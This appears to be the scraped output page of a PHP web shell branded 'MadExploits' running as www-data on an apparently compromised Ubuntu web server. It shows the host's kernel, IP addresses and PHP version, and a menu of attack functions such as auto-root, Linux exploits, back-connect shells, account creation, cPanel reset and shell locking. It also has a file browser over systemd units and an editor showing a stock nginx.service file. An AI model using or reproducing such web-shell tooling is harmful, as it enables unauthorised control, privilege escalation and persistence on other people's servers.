Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.115.6
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
apache2.service
395
B
-rw-r--r--
atd.service
347
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
cron.service
316
B
-rw-r--r--
dmesg.service
358
B
-rw-r--r--
elasticsearch.service
1.79
KB
-rw-r--r--
grub-common.service
583
B
-rw-r--r--
grub-initrd-fallback.service
408
B
-rw-r--r--
lxd-agent-9p.service
489
B
-rw-r--r--
lxd-agent.service
498
B
-rw-r--r--
mariadb.service
5.7
KB
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
nginx.service
1013
B
-rw-r--r--
php7.4-fpm.service
523
B
-rw-r--r--
php8.1-fpm.service
523
B
-rw-r--r--
pollinate.service
404
B
-rw-r--r--
remote-fs.target
522
B
-rw-r--r--
rsync.service
255
B
-rw-r--r--
rsyslog.service
435
B
-rw-r--r--
secureboot-db.service
604
B
-rw-r--r--
snap-core-17212.mount
323
B
-rw-r--r--
snap-core-17247.mount
323
B
-rw-r--r--
snapd.apparmor.service
1.21
KB
-rw-r--r--
snapd.autoimport.service
432
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
308
B
-rw-r--r--
snapd.service
607
B
-rw-r--r--
ssh.service
538
B
-rw-r--r--
sysstat.service
523
B
-rw-r--r--
systemd-resolved.service
1.69
KB
-rw-r--r--
thermald.service
290
B
-rw-r--r--
ua-reboot-cmds.service
323
B
-rw-r--r--
ufw.service
266
B
-rw-r--r--
unattended-upgrades.service
377
B
-rw-r--r--
vsftpd.service
248
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nginx.service
# Stop dance for nginx # ======================= # # ExecStop sends SIGSTOP (graceful stop) to the nginx process. # If, after 5s (--retry QUIT/5) nginx is still running, systemd takes control # and sends SIGTERM (fast shutdown) to the main process. # After another 5s (TimeoutStopSec=5), and if nginx is alive, systemd sends # SIGKILL to all the remaining processes in the process group (KillMode=mixed). # # nginx signals reference doc: # http://nginx.org/en/docs/control.html # [Unit] Description=A high performance web server and a reverse proxy server Documentation=man:nginx(8) After=network.target [Service] Type=forking PIDFile=/run/nginx.pid ExecStartPre=/usr/sbin/nginx -t -q -g 'daemon on; master_process on;' ExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;' ExecReload=/usr/sbin/nginx -g 'daemon on; master_process on;' -s reload ExecStop=-/sbin/start-stop-daemon --quiet --stop --retry QUIT/5 --pidfile /run/nginx.pid TimeoutStopSec=5 KillMode=mixed [Install] WantedBy=multi-user.target
Close